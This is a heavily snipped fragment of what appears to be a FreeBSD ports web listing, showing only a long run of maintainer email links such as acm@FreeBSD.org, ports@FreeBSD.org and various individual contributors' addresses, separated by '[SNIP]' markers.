...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pgj@FreeBSD.org">pgj@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pmn@bakarika.net">pmn@bakarika.net</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerald@FreeBSD.org">gerald@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:deischen@freebsd.org">deischen@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:karel@lovetemple.net">karel@lovetemple.net</A>
...[SNIP]...
<A HREF="mailto:karel@lovetemple.net">karel@lovetemple.net</A>
...[SNIP]...
<A HREF="mailto:freebsd-ports@coreland.ath.cx">freebsd-ports@coreland.ath.cx</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:devon.odell@gmail.com">devon.odell@gmail.com</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:alepulver@FreeBSD.org">alepulver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:n.smoot@gmail.com">n.smoot@gmail.com</A>
...[SNIP]...
<A HREF="mailto:mjs@Bur.st">mjs@Bur.st</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:amatus@gnu.org">amatus@gnu.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:umq@ueo.co.jp">umq@ueo.co.jp</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lev@FreeBSD.org">lev@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:atrn@zeta.org.au">atrn@zeta.org.au</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:maho@FreeBSD.org">maho@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vmagerya@gmail.com">vmagerya@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mutoh@openedu.org">mutoh@openedu.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hq@FreeBSD.org">hq@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tdb@FreeBSD.org">tdb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chromium@hybridsource.org">chromium@hybridsource.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bf@FreeBSD.org">bf@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:armin@frozen-zone.org">armin@frozen-zone.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pete@twisted.org.uk">pete@twisted.org.uk</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:emulation@FreeBSD.org">emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:devel@stasyan.com">devel@stasyan.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:brooks@FreeBSD.org">brooks@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:brooks@FreeBSD.org">brooks@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:brooks@FreeBSD.org">brooks@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:him@richardkiss.com">him@richardkiss.com</A>
...[SNIP]...
<A HREF="mailto:him@richardkiss.com">him@richardkiss.com</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jre@vineyard.net">jre@vineyard.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rick@wzoeterwoude.net">rick@wzoeterwoude.net</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mainland@apeiron.net">mainland@apeiron.net</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jesper.louis.andersen@gmail.com">jesper.louis.andersen@gmail.com</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mono@FreeBSD.org">mono@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:katsuji.ishikawa@gmail.com">katsuji.ishikawa@gmail.com</A>
...[SNIP]...
<A HREF="mailto:pjdelport@gmail.com">pjdelport@gmail.com</A>
...[SNIP]...
<A HREF="mailto:mathiasp@virtual-earth.de">mathiasp@virtual-earth.de</A>
...[SNIP]...
<A HREF="mailto:kaiw27@gmail.com">kaiw27@gmail.com</A>
...[SNIP]...
<A HREF="mailto:saper@saper.info">saper@saper.info</A>
...[SNIP]...
<A HREF="mailto:jimmy@mammothcheese.ca">jimmy@mammothcheese.ca</A>
...[SNIP]...
<A HREF="mailto:krion@FreeBSD.org">krion@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rene@FreeBSD.org">rene@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ozawa@ongs.co.jp">ozawa@ongs.co.jp</A>
...[SNIP]...
<A HREF="mailto:ninjin@kth.se">ninjin@kth.se</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:netj@sparcs.kaist.ac.kr">netj@sparcs.kaist.ac.kr</A>
...[SNIP]...
<A HREF="mailto:jhay@FreeBSD.org">jhay@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jaapb@kerguelen.org">jaapb@kerguelen.org</A>
...[SNIP]...
<A HREF="mailto:bkoenig@cs.tu-berlin.de">bkoenig@cs.tu-berlin.de</A>
...[SNIP]...
<A HREF="mailto:vanilla@FreeBSD.org">vanilla@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jasone@FreeBSD.org">jasone@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:micho@matem.unam.mx">micho@matem.unam.mx</A>
...[SNIP]...
<A HREF="mailto:gjb@FreeBSD.org">gjb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gjb@FreeBSD.org">gjb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:swills@FreeBSD.org">swills@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:swills@FreeBSD.org">swills@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:milki@rescomp.berkeley.edu">milki@rescomp.berkeley.edu</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:milki@rescomp.berkeley.edu">milki@rescomp.berkeley.edu</A>
...[SNIP]...
<A HREF="mailto:flo@smeets.im">flo@smeets.im</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joel@FreeBSD.org">joel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:glarkin@FreeBSD.org">glarkin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vmagerya@gmail.com">vmagerya@gmail.com</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:eg@fbsd.lt">eg@fbsd.lt</A>
...[SNIP]...
<A HREF="mailto:knu@FreeBSD.org">knu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:bapt@FreeBSD.org">bapt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beyert@cs.ucr.edu">beyert@cs.ucr.edu</A>
...[SNIP]...
<A HREF="mailto:osa@FreeBSD.org">osa@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jnlin@csie.nctu.edu.tw">jnlin@csie.nctu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:g.gonter@ieee.org">g.gonter@ieee.org</A>
...[SNIP]...
<A HREF="mailto:mva@FreeBSD.org">mva@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:saturnero@gufi.org">saturnero@gufi.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:estrabd@gmail.com">estrabd@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:g.gonter@ieee.org">g.gonter@ieee.org</A>
...[SNIP]...
<A HREF="mailto:g.gonter@ieee.org">g.gonter@ieee.org</A>
...[SNIP]...
<A HREF="mailto:bob@eager.cx">bob@eager.cx</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
